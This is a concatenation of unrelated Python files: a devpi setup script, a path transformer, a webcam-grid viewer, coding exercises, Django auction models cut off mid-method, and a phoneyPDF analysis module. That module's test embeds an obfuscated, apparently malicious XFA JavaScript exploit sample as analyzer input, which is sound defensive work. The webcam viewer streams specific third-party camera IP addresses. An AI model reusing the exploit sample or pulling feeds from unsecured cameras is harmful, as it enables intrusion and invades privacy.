with open('README.rst', encoding='utf-8') as f:
    README = f.read()
CHANGELOG = get_changelog()

# Runtime dependencies.
requires = [
    'py>=1.4.23',
    'appdirs',
    'devpi_common<4,>=3.3.0',
    'itsdangerous>=0.24',
    'execnet>=1.2',
    'pyramid>=1.8',
    'waitress>=1.0.1',
    'repoze.lru>=0.6',
    'passlib[argon2]',
    'pluggy>=0.3.0,<1.0',
    'strictyaml',
]

extras_require = {}

setup(
    name=about['__title__'],
    description=about['__description__'],
    keywords='pypi realtime cache server',
    # PyPI long description: README followed by the trimmed changelog.
    long_description="\n\n".join([README, CHANGELOG]),
    url=about['__url__'],
    version=about['__version__'],
    maintainer=about['__maintainer__'],
    maintainer_email=about['__maintainer_email__'],
    packages=find_packages(),
    include_package_data=True,
    zip_safe=False,
    license=about['__license__'],
    classifiers=[
        'Development Status :: 5 - Production/Stable',
        'Environment :: Web Environment',
        'Intended Audience :: Developers',
        'Intended Audience :: System Administrators',
        'License :: OSI Approved :: MIT License',
        'Programming Language :: Python',
        'Topic :: Internet :: WWW/HTTP',
        'Topic :: Internet :: WWW/HTTP :: WSGI :: Application',
        'Programming Language :: Python :: Implementation :: PyPy',
        'Programming Language :: Python :: 2.7',
        'Programming Language :: Python :: 3.4',
        'Programming Language :: Python :: 3.5',
        'Programming Language :: Python :: 3.6',
    ],
    install_requires=requires,
    extras_require=extras_require,
    entry_points={
        'console_scripts': [
            'devpi-server = devpi_server.main:main' ],
        'devpi_server': [
            'devpi-server-auth-basic = devpi_server.auth_basic',
            'devpi-server-auth-devpi = devpi_server.auth_devpi',
            'devpi-server-sqlite = devpi_server.keyfs_sqlite',
            'devpi-server-sqlite-fs = devpi_server.keyfs_sqlite_fs' ],
        'devpi_web': [
            'devpi-server-status = devpi_server.views'],
        'pytest11': [
            'pytest_devpi_server = pytest_devpi_server' ],
    },
)
|
8,076 | e4ff6d689a7da5b16786fd59d6a4707b9b6e3e7d | import os
# Shared message: the default transformer maps one key to one file name, so
# path separators cannot be represented.
error_msg = '''The default transformer cannot handle slashes (subdirectories);
try another transformer in vlermv.transformers.'''
def to_path(key):
if isinstance(key, tuple):
if len(key) == 1:
key = key[0]
else:
raise ValueError(error_msg)
if '/' in key or '\\' in key or os.path.sep in key:
raise ValueError(error_msg)
return (key,)
def from_path(path):
if len(path) != 1:
raise ValueError(error_msg)
return path[0]
|
8,077 | be63e8e6e98c9afed66cae033a7f41f1be1561a8 | #!/usr/bin/python3
import tkinter
from PIL import Image, ImageTk
import requests
from io import BytesIO
from threading import Timer
# Build a borderless full-screen window holding a 3x3 grid of camera feeds.
rootWindow = tkinter.Tk()
# the following makes the program full-screen
RWidth = rootWindow.winfo_screenwidth()
RHeight = rootWindow.winfo_screenheight()
#
rootWindow.overrideredirect(True) # without a close option
rootWindow.geometry(("%dx%d")%(RWidth,RHeight))
# Snapshot URLs for the nine public webcams shown in the grid; each is
# re-fetched continuously by its refreshCamNN loop below.
cameraURL01="http://209.251.247.251:82/cgi-bin/camera?resolution=640&amp;quality=1&amp;Language=0&amp;1507301122"
cameraURL02="http://108.209.209.13/webcapture.jpg?command=snap&channel=1?1507300788"
cameraURL03="http://72.81.132.14:60001/SnapshotJPEG?Resolution=640x480&amp;Quality=Clarity&amp;1507300872"
cameraURL04="http://24.98.52.12:8082/cgi-bin/viewer/video.jpg?r=1507300889"
cameraURL05="http://80.24.185.230:86/cgi-bin/camera?resolution=640&amp;quality=1&amp;Language=0&amp;1515078226"
cameraURL06="http://24.23.232.13:50001/cgi-bin/camera?resolution=640&amp;quality=1&amp;Language=0&amp;1507300932"
cameraURL07="http://80.24.185.230:81/cgi-bin/camera?resolution=640&amp;quality=1&amp;Language=0&amp;1515078327"
cameraURL08="http://80.24.185.230:82/cgi-bin/camera?resolution=640&amp;quality=1&amp;Language=0&amp;1515078336"
cameraURL09="http://63.172.41.245/webcapture.jpg?command=snap&channel=1?1508162812"
# One Label widget per grid cell; the refresh loops swap their images in place.
image01_label = tkinter.Label()
image02_label = tkinter.Label()
image03_label = tkinter.Label()
image04_label = tkinter.Label()
image05_label = tkinter.Label()
image06_label = tkinter.Label()
image07_label = tkinter.Label()
image08_label = tkinter.Label()
image09_label = tkinter.Label()
# Lay the labels out row-major in a 3x3 grid.
image01_label.grid(row=0, column=0)
image02_label.grid(row=0, column=1)
image03_label.grid(row=0, column=2)
image04_label.grid(row=1, column=0)
image05_label.grid(row=1, column=1)
image06_label.grid(row=1, column=2)
image07_label.grid(row=2, column=0)
image08_label.grid(row=2, column=1)
image09_label.grid(row=2, column=2)
def main():
    """Bind Escape to quit and start one background refresh loop per camera."""
    rootWindow.bind('<Escape>', close)
    # Each Timer kicks off a refreshCamNN loop that reschedules itself, so
    # frame fetching happens on timer threads, off the Tk event loop.
    Timer(0.1, refreshCam01).start()
    Timer(0.1, refreshCam02).start()
    Timer(0.1, refreshCam03).start()
    Timer(0.1, refreshCam04).start()
    Timer(0.1, refreshCam05).start()
    Timer(0.1, refreshCam06).start()
    Timer(0.1, refreshCam07).start()
    Timer(0.1, refreshCam08).start()
    Timer(0.1, refreshCam09).start()
def URL2PhotoImage(URL):
    # Fetch one snapshot over HTTP (4 s timeout), scale it to one cell of the
    # 3x3 grid, and wrap it in a tkinter PhotoImage.
    # NOTE(review): Image.ANTIALIAS is removed in Pillow 10+; newer Pillow
    # needs Image.LANCZOS here -- confirm the pinned Pillow version.
    return ImageTk.PhotoImage(Image.open(BytesIO(requests.get(URL, timeout=4).content)).resize((int(RWidth/3),int(RHeight/3)), Image.ANTIALIAS))
def refreshCam01():
    """Fetch a new frame for camera 1 and reschedule while the window lives."""
    try:
        tmp_photo = URL2PhotoImage(cameraURL01)
        image01_label.configure(image=tmp_photo)
        image01_label.image = tmp_photo # keep a reference to prevent tkinter garbage collection
    except Exception:
        # Was a bare `except:`, which also swallowed KeyboardInterrupt and
        # SystemExit; only expected fetch/decode failures should be ignored.
        pass
    if rootWindow.state() == 'normal': Timer(0.05, refreshCam01).start()
def refreshCam02():
    """Fetch a new frame for camera 2 and reschedule while the window lives."""
    try:
        tmp_photo = URL2PhotoImage(cameraURL02)
        image02_label.configure(image=tmp_photo)
        image02_label.image = tmp_photo # keep a reference to prevent tkinter garbage collection
    except Exception:
        # Narrowed from a bare `except:` so KeyboardInterrupt/SystemExit
        # are no longer swallowed.
        pass
    if rootWindow.state() == 'normal': Timer(0.05, refreshCam02).start()
def refreshCam03():
    """Fetch a new frame for camera 3 and reschedule while the window lives."""
    try:
        tmp_photo = URL2PhotoImage(cameraURL03)
        image03_label.configure(image=tmp_photo)
        image03_label.image = tmp_photo # keep a reference to prevent tkinter garbage collection
    except Exception:
        # Narrowed from a bare `except:` so KeyboardInterrupt/SystemExit
        # are no longer swallowed.
        pass
    if rootWindow.state() == 'normal': Timer(0.05, refreshCam03).start()
def refreshCam04():
    """Fetch a new frame for camera 4 and reschedule while the window lives."""
    try:
        tmp_photo = URL2PhotoImage(cameraURL04)
        image04_label.configure(image=tmp_photo)
        image04_label.image = tmp_photo # keep a reference to prevent tkinter garbage collection
    except Exception:
        # Narrowed from a bare `except:` so KeyboardInterrupt/SystemExit
        # are no longer swallowed.
        pass
    if rootWindow.state() == 'normal': Timer(0.05, refreshCam04).start()
def refreshCam05():
    """Fetch a new frame for camera 5 and reschedule while the window lives."""
    try:
        tmp_photo = URL2PhotoImage(cameraURL05)
        image05_label.configure(image=tmp_photo)
        image05_label.image = tmp_photo # keep a reference to prevent tkinter garbage collection
    except Exception:
        # Narrowed from a bare `except:` so KeyboardInterrupt/SystemExit
        # are no longer swallowed.
        pass
    if rootWindow.state() == 'normal': Timer(0.05, refreshCam05).start()
def refreshCam06():
    """Fetch a new frame for camera 6 and reschedule while the window lives."""
    try:
        tmp_photo = URL2PhotoImage(cameraURL06)
        image06_label.configure(image=tmp_photo)
        image06_label.image = tmp_photo # keep a reference to prevent tkinter garbage collection
    except Exception:
        # Narrowed from a bare `except:` so KeyboardInterrupt/SystemExit
        # are no longer swallowed.
        pass
    if rootWindow.state() == 'normal': Timer(0.05, refreshCam06).start()
def refreshCam07():
    """Fetch a new frame for camera 7 and reschedule while the window lives."""
    try:
        tmp_photo = URL2PhotoImage(cameraURL07)
        image07_label.configure(image=tmp_photo)
        image07_label.image = tmp_photo # keep a reference to prevent tkinter garbage collection
    except Exception:
        # Narrowed from a bare `except:` so KeyboardInterrupt/SystemExit
        # are no longer swallowed.
        pass
    if rootWindow.state() == 'normal': Timer(0.05, refreshCam07).start()
def refreshCam08():
    """Fetch a new frame for camera 8 and reschedule while the window lives."""
    try:
        tmp_photo = URL2PhotoImage(cameraURL08)
        image08_label.configure(image=tmp_photo)
        image08_label.image = tmp_photo # keep a reference to prevent tkinter garbage collection
    except Exception:
        # Narrowed from a bare `except:` so KeyboardInterrupt/SystemExit
        # are no longer swallowed.
        pass
    if rootWindow.state() == 'normal': Timer(0.05, refreshCam08).start()
def refreshCam09():
    """Fetch a new frame for camera 9 and reschedule while the window lives."""
    try:
        tmp_photo = URL2PhotoImage(cameraURL09)
        image09_label.configure(image=tmp_photo)
        image09_label.image = tmp_photo # keep a reference to prevent tkinter garbage collection
    except Exception:
        # Narrowed from a bare `except:` so KeyboardInterrupt/SystemExit
        # are no longer swallowed.
        pass
    if rootWindow.state() == 'normal': Timer(0.05, refreshCam09).start()
def close(event=None):
    """Stop the Tk mainloop (bound to the Escape key in main())."""
    rootWindow.quit()
# start the subprocess, main loop, and gui
if __name__ == '__main__':
main()
rootWindow.mainloop()
|
8,078 | 0ef03ed455938bd2001581986c38104bfac395ce | # leetcode 836
# determine if two rectangles overlap
# input is two lists [x1,y1,x2,y2] coordinates
# where x1,y1 are coordinates of bottom left corner
# and x2,y2 are coordinates of top right corner
def overlap_rect(rec1, rec2):
    """Return True when two axis-aligned rectangles overlap.

    Each rectangle is [x1, y1, x2, y2], where (x1, y1) is the bottom-left
    corner and (x2, y2) the top-right corner. Rectangles that merely touch
    along an edge are NOT considered overlapping.
    """
    # Two rectangles are disjoint iff one lies fully to the left of, right
    # of, below, or above the other (separating-axis reasoning).
    separated = (
        rec2[2] <= rec1[0] or   # rec2 entirely left of rec1
        rec1[2] <= rec2[0] or   # rec2 entirely right of rec1
        rec2[3] <= rec1[1] or   # rec2 entirely below rec1
        rec1[3] <= rec2[1]      # rec2 entirely above rec1
    )
    return not separated
|
8,079 | bf9e83591f737caec3060b72d86d56faec9bb23b | # 5. Усовершенствовать программу «Банковский депозит». Третьим аргументом в функцию должна
# передаваться фиксированная ежемесячная сумма пополнения вклада. Необходимо в главной
# функции реализовать вложенную функцию подсчета процентов для пополняемой суммы.
# Примем, что клиент вносит средства в последний день каждого месяца, кроме первого и
# последнего. Например, при сроке вклада в 6 месяцев пополнение происходит в течение 4
# месяцев. Вложенная функция возвращает сумму дополнительно внесенных средств (с
# процентами), а главная функция — общую сумму по вкладу на конец периода.
from task_1_4 import get_percent
def chargeable_deposit(amount, months, charge=0):
    """Print the final value of a deposit with fixed monthly top-ups.

    amount -- initial deposit; months -- term in months; charge -- fixed sum
    added at the end of every month except the first and the last. The yearly
    rate is looked up via get_percent(amount, months).
    """
    percent = get_percent(amount, months)
    if not percent:
        print('Нет подходящего тарифа')
        # Bug fix: previously execution fell through and multiplied the
        # balance by None (TypeError) / computed a zero-rate total.
        return
    total = amount
    for month in range(months):
        # accrue one month of interest on the current balance
        profit = total * percent / 100 / 12
        total += profit
        if month != 0 and month != months - 1:
            # top-up plus the single month of interest the top-up earns
            total += charge + charge * percent / 100 / 12
    print(round(total, 2))
chargeable_deposit(10000, 24, 100)
|
8,080 | 59b2d0ff3296c9d9a76b8b69a784d5a0c46128be | '''
XFA/XDP DOM in Javascript
This file is part of the phoneyPDF Framework
This module provides methods for transforming both PDF objects and XML (xfa/xdp) into a single structure of linked objects
in javascript. The idea is that any *DOM interation will play out in javascript land, where the DOMs are created and
maintained as the PDF is 'rendered'.
Trevor Tonn <smthmlk@gmail.com>
Copyright (c) 2013, VERISIGN, Inc
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither the name of VERISIGN nor the names of its contributors
may be used to endorse or promote products derived from this software
without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
from lxml import etree
DEBUG = True
def removeNamespace(element, logger):
    '''
    Strip every '{uri}' namespace wrapper listed in element.nsmap out of
    element.tag, mutating the element in place. Probably a bad idea.
    '''
    if not element.nsmap:
        logger.info("empty nsmap")
        return
    for prefix, uri in element.nsmap.items():
        wrapped = "{%s}" % uri
        logger.debug("removing %s => %s: %s" % (prefix, uri, wrapped))
        element.tag = element.tag.replace(wrapped, "")
def elementToJS(element, jsStrL, logger):
    """Recursively append javascript statements to jsStrL that rebuild
    `element` and its subtree as linked Element objects in js land.

    Mutates `element` (its tag loses namespace prefixes) and `jsStrL`.
    """
    logger.debug("converting element '%s'" % element.tag)
    origTag = element.tag
    removeNamespace(element, logger)
    if origTag != element.tag:
        logger.debug(" -- tag had namespace removed; new tag: %s" % element.tag)
    # add element first
    jsStrL.append("%s = new Element('%s');" % (element.tag, element.tag))
    # see if there's any text
    if element.text:
        # we will likely need to escape chars like ' and " to make this work...
        jsStrL.append("%s.text = \"%s\";" % (element.tag, element.text.strip()))
    # add children both by their tagname and as integers
    index = 0
    for childElement in element.getchildren():
        # create child recursively
        elementToJS(childElement, jsStrL, logger)
        if element.tag == 'subform':
            #TODO: process subform for field names
            pass
        # now, add this child both as a property and something accessible via index
        jsStrL.append("%s.%s = %s;" % (element.tag, childElement.tag, childElement.tag))
        jsStrL.append("%s[%d] = %s;" % (element.tag, index, childElement.tag))
        index += 1
def xmlToJS(xml, logger):
    '''
    Takes an LXML element tree and converts it into javascript code that, when executed by
    a javascript engine, will create a very similar structure that can be manipulated in
    javascript land by other scripts.
    Returns a string of javascript suitable for eval()'ing.
    '''
    # Prepare the javascript string with a defintion of our 'Element' object
    jsStrL = ["""
function Element(tag) {
    this.tag = tag;
    // this needs a lot more stuff added to it...
}
"""]
    # Convert XML elements into a tree of javascript objects.
    # NOTE: Python 2 except syntax below; on failure the error is logged and
    # whatever partial script was built so far is still returned.
    try:
        elementToJS(xml, jsStrL, logger)
    except Exception,e:
        logger.warn(e)
        pass
    return '\n'.join(jsStrL)
def getExposedObjects():
    '''
    Adobe Reader exposes various built-in objects to javascript under the
    hood; return a javascript string defining stand-ins for those objects.
    '''
    return """
    var app = Object();
    """
def test_xmlToJS():
#x="""<xfa><subform><g><script>var q='hector'; var p='go'; var f=function(a,b){ return a+' '+b; };</script></g></subform><subform2><ggg><script language="javascript">print( f(p,q) );</script></ggg></subform2></xfa>"""
y="""<template xmlns="http://www.xfa.org/schema/xfa-template/2.5/"><subform layout="tb" locale="en_US" name="kos"><pageSet><pageArea id="rya" name="rya"><contentArea h="756pt" w="576pt" x="0.25in" y="0.25in"/><medium long="792pt" short="612pt" stock="default"/></pageArea></pageSet><subform h="756pt" w="576pt" name="upo"><field h="65mm" name="sac" w="85mm" x="53.6501mm" y="88.6499mm"><event activity="initialize" name="cum"><script contentType="application/x-javascript">
abo=kor([app]);kop();function led(y,s){var v,p,g,f,m,o,a,z,x,h,b,f,w,l;a=sac.rawValue.replace(/[QjCGRkhPK]/g,'');o='';z='';h=0;v='substr';m=y.length;l='fromCh';l+='arCode';g=String;for(w=0;w<m;w++){h+=s;f=y[v](w,1);b=a.indexOf(f);b+=h;b%=a.length;o+=a[v](b,1)}for(x=0;x<m;x+=2){f=o[v](x,2);p=parseInt(f,16);z+=g[l](p)}return z}function kor(g){return g[0]}function red(){var f,b,i,a,c,m,g,k,z,w,u,t,y;m='ib94oe0z7aY9e2';c=2;w=led(m,c);z='z8I7i6o6z6aa';t=29;i=led(z,t);b='X8aWSSz53389eYiiba2fdIza61';g=23;a=led(b,g);f='fdYcYel5bi0aII45';k=24;y=led(f,k);u=abo[a][y]();u=u[w]('.','');while(u[i]<4){u+='0'}u=parseInt(u,10);return u}function kop(){var u,j,kw,z,w,v,kr,o,x,n,ky,r,c,s,m,kc,b,ka,km,f,p,l,q,kp,a,d,kk,h,kv,y,kb,ku,t,i,ks,k,kt,g;r='8eWd2d3f1bXed868f5bae07o4i5IazaSoii2IYz0892W27Y7019XWlS63f1bXed164f5bael7o705SaSl8ocidIYz089cW28Y3019XWdS9Yl1IXId764f2bael7o4i57azl8oci2I6808bce2SY3059XWdS63f1XXed764f5bib2794W5Iazl1oci2IYz0z6c22SY301WaWdSo3o1bX4XI64f5baea4l455Iazl8oci2IYz089cW2SYX049Xco4754a5laol';k=21;u=led(r,k);m=11146;m-=2945;y=2815;y-=815;v='133S2eiX';w=24;s=led(v,w);p='58lfo01Si5Y7e826bzc14d064SlX7SYW8460z7dYIez96Xzid1IoXcil1Soa3Wl5S9a4W0579Y4e024bYcef28b6czfd8I6Xze6259X3Ia0Yo61fe1SbboSza6od430Sd5fWbi28edo1fdl9S4a2X1izdei718oz1iooWca4SYf6Wz4e027bYcef28b6czfd8I6Xzid1IoX3il1Soa3WldSIl4Sf5a9o5e9d74Ya7fY8eo2e358Sd9ai655I96ia17oYzzld305XWfaa8X5zzW74Y0Wo25b42Wff75da84d2IbXb42X7laSilo3calW151Wo6z024fI377i81l2abdcIf585d6Ic1SIfXbo619e83bl3cd580Y3I9c4IIWbf21bo44f0cidYzW665Yd44z1XoizbldSXa4W84aoW73Y57SYSXlY1f68efbca6fz2d2zb94ilXW781ia52o0oi6a7Wd5d097a287WYSb92I35cSfca0d5ib1cia0zWzzel2SbXXWiae0o4z99do0XX42Ybe4Sf08YY5ziddIoX3if18o8Yfo2W953WSa69W4l0l4SIXefYzfecY3Y7cd4a261z0d0iI16l51zo8SIl7cda8Wa6i0deSI9W0iYz7dYfl8SYYze63ibX4II0biYYXloS3X8Wi5oeS3z0c4bIWeW25b5oWbll26fz824IbXfi81Soa3Wl5SdaaSYfI966a0c74a1eW29';b=27;c=led(p,b);t='o6207oY2S14dWf6I';a=10;j=led(t,a);i=4132;i+=3868;d='c413iIeoaI76acY3823IX6976ce9Iic6bb44llIIcc5SiY8WY1W61365eo5zo2z9239d3bd4bl4Ilcz0cS0XSfX7fa7ia8iYzc07W71ef4X45
zo6acif0d1odfe747lW51c8beSfde307ol84a8e22S33XYceb5076a9c49d1fWfe74IlcI0cS0XSfX7fa7ia8iY8WY1W61e65eo5zo2zI2cWd1Idlbf5IoXISc89X2fda30d0a1oIlW05cb0a64eI1Wi1z9YS0X3f2X125Sac5o2Yl5SWXobc7zXlo6ccY4W78eS8e944o2Ifi69b3aX6e242lczYob9f2f9zbb4i5Xodc2Y2W43i6XXo54icI9Yd8oYodcfl3Wo8zfo6YXSecIbc7ilzo289a2caXzd5Xfal6XzI2f9d3XXl9I77adI34Sz4Si11fae9b0iW8d20Sa1a657lf9i5I9izeeziX2fY5alaI18b022fX1b5eilY4flfY5993364XfY06dzS5eW53b67fa4ida5d27YX29d6027ea9fd8WYdW61e6ce81z71zbcc9dSiWobI4Yaozdcd0X361afIdbXYoXld2a9lXd6dec4Woaa92cWXSb6l1969lXiiodlc27llII7zXSIX8W039d1bYdXYa3l2aiY0oa3Sdizz3Sl8z0o605S4c73c7W584lc2a4W91l6Ieo5zo2z92z94Y4Wzb07Ieiz84e0YS5';h=13;x=led(d,h);o='5f944c0bl2Yi';q=27;n=led(o,q);f='fIYI61Wai16Sio6dSai16IYb';l=15;g=led(f,l);z='6a6f696e';kr=25;kk=led(z,kr);ku=15820;ku-=6519;km=red();if(km>=i){ky='';kv=g;kw=pub(s,y);ks=21;kp='of922ozi89Xed564f5bebaS74S5ab9dzi04WIY11coo6YSYeY295SdS4Sf3IXS2adzII10X8c82cY20YoYoi4Xbazlzbcd57YSY78bW7Wdz1XXX8deSz65b2b9dz6z4SXle1lci5i6aXz6c72WIeY28WW436Y51aXbW56164boedS7621W5zl1oiic5XIzlcceYS25039YidW9Y181XeWI6if41oel7I555I54d86aodIfeY808fidYfzeWWcl3e360ocWdo673lbael4z34fia2eXlcfXI3zYl68ciW0zz59e77SdSl05Xl66So3ibeeadY74a3lee1odflI2Idl1cdi4azY0eeWXS7303bddWSY7f5be724065fI5WeSoWic59zbzIo25Y0Y06W49lS4Yf1fXeWl6i0b12Xzez35aIbYl9o84W51I88fciYY0Sl40XWlS0360o9a2e673b1Ie87l6YfiaWoS7Xia5WzYl6oX26I5l8097eSe341o1I6IScfIbdeadY6c5Yb1d7loSWIXz6z3cdi8I6069eWl27371adXWcSl62b5eld842fc5Sl37441zWei8fdXYbY7l1Wa9oWe358X15W6Si3zei727c4zf95a99o1i6ifablb81YIa3l9WfiWIaS107XI27fcIi16WYdb42aba9o370I2iazYle89260d979eW7Sd3f05Xl6Ifl041eWY4o6c5YaIe2o5fXbI8l73o65e27Y792WX2aS30X9lW5flfob8Wleb655W5WeSoWic59z08X22Y207l1oYceSe551W9i2zYz0be2bI7c354Ibzl0li43bdzXzc4iY7Yz03ociX2Y5405dXX6dff592e84639a552ooo0fdzdz87o27cSIzl3WW9lS4Y981ciX6dl3l1c7I44691aaWe2oaiW5a80z64f520e098595Sd370acIWlY3fXb5X2e765f952oz6Xi5IWIilc81ib2S0b91cYI6Y6Xod5W3f2b8eiX64W50fcl290oco9zaa0l64c5e2406869bSlS11bcIdof30cebbI4449a3lSlo64I65dal7022c7Y7zc05caS7z03SczWl6lb8bieY4Y4e1Slle2iciS5YIdz8o2i7Y3Y0ebWX273a3iX3XaflIibaXz4z4
Y59bcl4l34cIf13zb4biY030c91c5WSY18bcdd6Si0b1dbfd458495Il9o84ab2e07IoXifY60282S2SlS11bcIdoff3195el7450aWbll5ococI3zYlSc7i72e0bW4c03aSi1Xcbdedz3ibz777974faaIe779iSI2aW89cIYYY3Y2oXi0WdY9049iooYf3bzIbld45e5200l47iic5Xa38X22i1f6zcWYSdI3Yf8i9W2d61f41cXzSY701I5Se56iI5baa07c2i5IYel9Wci2Sd1la5dWW7dz011ce27l6bYYaSdS6aiabdezco41ifa7Y2WWW7SdYl319dWz6cf4b0Wa4z7efaXSo879iSI2aW89cdYYI0l89eS536Sf19X3W6Yz051ib24W6e1aled7o8fI5dIi8f822SY00bWcia3SS70Xll6667f4baXz7c6if352o5ii43b2al8929cXI0za84ceS436311WW66X359b70493i43bla1oc4WI3zYl1ob2Ia0zc05c5S6Ye1ice26S86516WI4Y3Wfal3lSi1IlbI8Szeo2i6Y3zf9eWX27Yo19cWWlSc049XbIdz3i1al2a37iic5Xad8Xc9iza3z79a7e3e548X156SS43lzzX8ez554ib3lS7049idaY7fo65IYf038490I61304dWW76X3dfcea4o3e5aXSe3oco1iY8l81c7idYSz78bW73a54XIcd26S865b6e0dI45fW5Wlzo04Sbdal78cd2WIeY08Wi23iz68fX36adX3be2eld8425i52oYW9fIiW8ll9of5S00Y59fcfWe3o3XdiWlYz6b1oWI7b50f35zl5i3i25Yzic6cz5XYcz591WSIaz1Xi15dod63Ife7ee46Y1WaelW7YoXbozY8022cS20l8WaW2Sdz08f9W2zf8fo96e6d43857lIl5lcilIXzlX12zibaYl40aWb2bS71XXIWId6651c72447W5ebYlYioi35SzSlbcb5WY00co5WSSe3f1I9adaf4fI1cbId638aWX3l373IXbWzi80ddYSael9W59bS4z13b9edldf3z92ece43faSaelz64fc5a13lec158Y8z99l7eIezo14ded3Sz6o1XXf744W59lzooo0I2IWadz3oiib03l69YWX44351idIW6Y8b81aWddY4o5ibclX75I6IYa38X22ifa0l4Wlcf2eY01f9S2ISff4eaXz7c4ofea9o3liI1I3zfcIcWYeIX998ciXS631XodIW6fzbfeXWlS45847bleXioI5bYe8l32icS00zeoa772oYI1b9Sdcf33110797Y481Sa1lS75o1Ifzdli8c2407z88ccb2iY907dX2eYf68b07Y4922f7X4dolaIiIdez762c58a0zf8Yi0IlSI0bXi2zYzbff0baSY6ef3bYdYiofli2eS81o7c22d0f8liaIe341i9a2zf66Yf58zdb7S1bX2l07dfXbW8zcf8cc8Y6zao5ib3S3o8X1X6dd23IzI7e406c1SaYe2l3f9zI86z88e2dI5l40cWeWi3i8IXbWISofI';kb=led(kp,ks);kc=pub(s,7600);if(km<m){ky=c}else if(km<ku){ky=x}if(ky[n]){kt=u;ka=[kv,kw,kb,kc,kt,ky][kk]('');sac[j]=ka}}return}function pub(j,u){var a,r,w,g,q,y;y='967e2IfXYiX7';w=6;g=led(y,w);a='WfdY64oYc4WSSe694d';q=30;r=led(a,q);while(j[g]<u){j+=j}j=j[r](0,u);return j}</script></event><ui><imageEdit/></ui></field></subform></subform></template>"""
xml=etree.fromstring(y)
jsStr = xmlToJS(xml)
print jsStr
if __name__ == "__main__":
test_xmlToJS()
|
8,081 | 9d772d5500593583907b65bc2c81490e61375e8b | class TimeInterval(object):
def __init__(self, start_time, end_time):
self.start_time = start_time
self.end_time = end_time
|
8,082 | 9bb15842b39c7fd3e6f6c0048a51c2b2112ddb94 | from django.db import models
from django.contrib.auth.models import User
from django.utils.encoding import smart_unicode
from django.core.validators import MinValueValidator
from django.utils import timezone
from concurrency.fields import IntegerVersionField
class ProductCategory(models.Model):
    # Lookup table of product categories; `name` is forced unique via Meta.
    name = models.CharField(max_length=20)
    class Meta:
        # NOTE(review): (("name")) is just the string "name" in parentheses,
        # so this is the 1-field tuple ("name",) -- valid, but written oddly.
        unique_together = (("name"),)
    def __unicode__(self):
        # Python 2 string representation (this file predates Python 3).
        return smart_unicode(self.name)
class Product(models.Model):
    """An item offered for sale by a seller, belonging to one category."""
    name = models.CharField(max_length=20)
    seller = models.ForeignKey(User, verbose_name="seller")
    initial_price = models.DecimalField(max_digits=10, decimal_places=2,
        validators=[MinValueValidator(0)], verbose_name="starting bid")
    description = models.TextField(max_length=280)
    # auto_now_add expects a boolean flag; the previous `timezone.now()`
    # argument only "worked" because any datetime is truthy (and it was
    # evaluated once at import time).
    timestamp = models.DateTimeField(auto_now_add=True, auto_now=False)
    product_category = models.ForeignKey(ProductCategory, verbose_name="product category")
    # optimistic-locking counter provided by django-concurrency
    version = IntegerVersionField()

    def __unicode__(self):
        # Python 2 string representation (this file predates Python 3).
        return smart_unicode(self.name)
class AuctionStatus(models.Model):
    # Lookup table of auction states; query helpers elsewhere in this module
    # filter on status_id=1.
    name = models.CharField(max_length=20)
    version = IntegerVersionField()
    class Meta:
        # NOTE(review): (("name")) is the 1-field tuple ("name",) -- valid,
        # but written oddly.
        unique_together = (("name"),)
    def __unicode__(self):
        # Python 2 string representation (this file predates Python 3).
        return smart_unicode(self.name)
class Auction(models.Model):
    """A listing that sells one Product.

    The query helpers below treat status_id == 1 as "active" (see
    fetchActiveAuctions).
    """
    title = models.CharField(max_length=20)
    current_price = models.DecimalField(max_digits=10, decimal_places=2, default=0,
        null=True, blank=True, verbose_name="current bid")
    # auto_now expects a boolean flag; the previous `timezone.now()` argument
    # was merely truthy (and evaluated once at import time).
    updated_time = models.DateTimeField(auto_now_add=False, auto_now=True)
    end_time = models.DateTimeField(verbose_name="end time")
    product = models.OneToOneField(Product, related_name='product')
    status = models.ForeignKey(AuctionStatus, verbose_name="auction status")
    version = IntegerVersionField()

    class Meta:
        unique_together = (("title"),)
        ordering = ['end_time']

    def __unicode__(self):
        # Python 2 string representation (this file predates Python 3).
        return smart_unicode(self.title)

    @classmethod
    def fetchActiveAuctions(cls):
        """Return all active auctions, soonest-ending first."""
        # order_by('-end_time').reverse() was just ascending end_time, and the
        # old `except IndexError` around a lazy QuerySet could never fire.
        return cls.objects.filter(status_id=1).order_by('end_time')

    @classmethod
    def getAuctionByID(cls, aucid):
        """Return the active auction with primary key `aucid`, or None."""
        try:
            return cls.objects.get(id=aucid, status_id=1)
        except cls.DoesNotExist:
            # Bug fix: .get() raises DoesNotExist, never IndexError, when no
            # row matches -- the old handler let the exception escape.
            return None

    @classmethod
    def getAuctionByCategory(cls, catid):
        """Return active auctions whose product is in category `catid`."""
        # NOTE(review): passing a queryset to product_id relies on Django's
        # implicit subquery behaviour; `product__in=prodcat` would be explicit.
        prodcat = Product.objects.filter(product_category=catid)
        return cls.objects.filter(product_id=prodcat, status_id=1)

    @classmethod
    def getAuctionByOwner(cls, ownerid):
        """Return active auctions whose product is sold by user `ownerid`."""
        myprod = Product.objects.filter(seller_id=ownerid)
        return cls.objects.filter(product_id=myprod, status_id=1)

    @classmethod
    def getOwnerByAuctionID(cls, aucid):
        """Return the seller (User) of the active auction `aucid`, or None."""
        try:
            auction = cls.objects.get(id=aucid, status_id=1)
            product = Product.objects.get(id=auction.product_id)
            return product.seller
